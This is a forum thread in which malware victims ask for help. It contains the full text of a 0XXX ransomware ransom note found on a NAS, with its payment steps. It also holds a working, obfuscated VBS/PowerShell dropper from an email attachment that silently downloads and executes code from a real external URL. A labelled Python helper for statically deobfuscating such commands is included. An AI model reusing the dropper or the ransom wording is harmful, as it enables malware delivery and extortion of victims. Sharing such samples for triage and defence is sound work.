I was navigating through my NAS Buffalo LS-220de drives and found this on my 5TB drive...It only seemed to be on a specific date and time, Sept 8th 2022 @ 10:00PM to 10:11PM...Maybe 30 folders were affected..no big deal, as I was able to rename and remove the extension...How did this happen...was it NAS specific?

All your files have been encrypted with 0XXX Virus.
Your unique id: 166954F4D8B14F1A96F3287B35A78858
You can buy decryption for 300$USD in Bitcoins.
To do this:
1) Send your unique id 166954F4D8B14F1A96F3287B35A78858 and max 3 files for test decryption to 08don_juan_1970689@mail.ru
2) After decryption, we will send you the decrypted files and a unique bitcoin wallet for payment.
3) After payment ransom for Bitcoin, we will send you a decryption program and instructions.
If we can decrypt your files, we have no reason to deceive you after payment. Also after payment we will give you some tips to protect yourself from this in the future.

FAQ:
Can I get a discount?
No. The ransom amount is calculated based on the number of encrypted office files and discounts are not provided. All such messages will be automatically ignored.
What is Bitcoin?
read bitcoin.org
Where to buy bitcoins?
hxxps://bitcoin.org/en/buy hxxps://buy.moonpay.io or use google.com
Where is the guarantee that I will receive my files back?
The very fact that we can decrypt your random files is a guarantee. It makes no sense for us to deceive you. Moreover, it would hurt our business.
How quickly will I receive the key and decryption program after payment?
As a rule, within a few minutes or hours, but very rarely there may be a delay of 1-2 days.
How does the decryption program work?
It's simple. You need to copy the key and select a folder to decrypt. The program will automatically decrypt all encrypted files in this folder and its subfolders.

There are some free decryption tools; you can try searching Google for one that fits yours. Examples:
https://noransom.kaspersky.com/
https://www.avast.com/ransomware-decryption-tools#pc
https://www.nomoreransom.org/en/decryption-tools.html
https://www.emsisoft.com/ransomware-decryption/

It really didn't do anything...I just removed the extensions and the files were fine...How did this happen? Where did I get this?

@ABM Apparently the 0XXX ransomware sneaks in through open SMB ports in NAS or similar network-connected devices. There is no working decryptor yet for this one. It could be possible that the ransomware can't encrypt certain file types (e.g. FLAC), hence you could simply change the extension to get the original files back. I suggest you participate in the ongoing discussion on the Bleeping Computer forums and share your experience. Also, harden your network security and change the default SMB ports on the NAS.

Tito good morning, need help. Yesterday I received a mail with file.img attached, file.vbs inside; my wife opened it. I can't find anything about it, sorry & thanks.

Code:

    Set oProcess = GetObject("winmgmts:Win32_Process")
    Set objStartup = GetObject("winmgmts:Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = 0
    Set oInParams = oProcess.Methods_("Create"). _
        InParameters.SpawnInstance_
    oInParams.CommandLine = "Powershell " + mkwelld() + welllf()
    oInParams.ProcessStartupInformation = objConfig
    Set oOutParams = oProcess.ExecMethod_("Create", oInParams)

    Function mkwelld()
    mkwelld="$t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ct"
    End Function

    Function welllf()
    welllf="ion.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'h' + 'tt' + 'ps' + '://complexdental.hu/menu.txt')|P"
    End Function

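Added example, not part of the original post: a static triage helper that folds the split string literals and the constant .replace() chain used in a command line like the one above, so the alias target and the download URL can be read without running the attachment. The sample string is constructed in the post's style with a reserved .invalid host, and the names deobfuscate and triage are hypothetical.

```python
import re

# Constructed sample in the style of the posted command line; the host is a
# reserved .invalid name, not the one from the post.
SAMPLE = (
    "$t0='DE5'.replace('D','I').replace('5','x');sal P $t0;"
    "'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + "
    "'thPartialName(''Microsoft.VisualBasic'')'|P;"
    "$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;"
    "$mv=[Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + "
    "'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,"
    "'h' + 'tt' + 'ps' + '://example.invalid/menu.txt')|P"
)

LIT = r"'(?:[^']|'')*'"  # PowerShell single-quoted literal ('' is an escaped quote)
CHAIN = re.compile(rf"{LIT}(?:\s*\+\s*{LIT})*")
REPL = re.compile(rf"({LIT})((?:\.replace\({LIT},{LIT}\))*)", re.I)
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
              "net.webclient", "silentlycontinue")

def _fold(m):
    """Join 'a' + 'b' + ... into one literal without executing anything."""
    return "'" + "".join(p[1:-1] for p in re.findall(LIT, m.group(0))) + "'"

def _replace(m):
    """Evaluate a constant 'x'.replace('a','b') chain (case-sensitive, like .NET)."""
    s = m.group(1)[1:-1]
    for a, b in re.findall(r"\('([^']*)','([^']*)'\)", m.group(2)):
        s = s.replace(a, b)
    return "'" + s + "'"

def deobfuscate(cmd):
    return REPL.sub(_replace, CHAIN.sub(_fold, cmd))

def triage(cmd):
    clear = deobfuscate(cmd)
    variables = dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", clear))
    aliases = {a: variables.get(v, "$" + v) for a, v in
               re.findall(r"\b(?:sal|set-alias)\s+(\w+)\s+\$(\w+)", clear, re.I)}
    urls = [u.replace("http", "hxxp", 1)  # defanged for reporting
            for u in re.findall(r"https?://[^\s'\"]+", clear)]
    hits = sorted(k for k in SUSPICIOUS if k in clear.lower())
    return {"clear": clear, "aliases": aliases, "urls": urls, "hits": hits}

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

On the sample, the alias P resolves to IEx (Invoke-Expression), so every string piped to P is executed, including whatever text the URL returns.
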
You got very lucky the ransomware doesn't work on those NAS extensions; if not, you would be f**ked now....Best back up all your data and secure your NAS ports, lock it down as much as possible....It's just a matter of time before they write malicious code that will encrypt those types of files.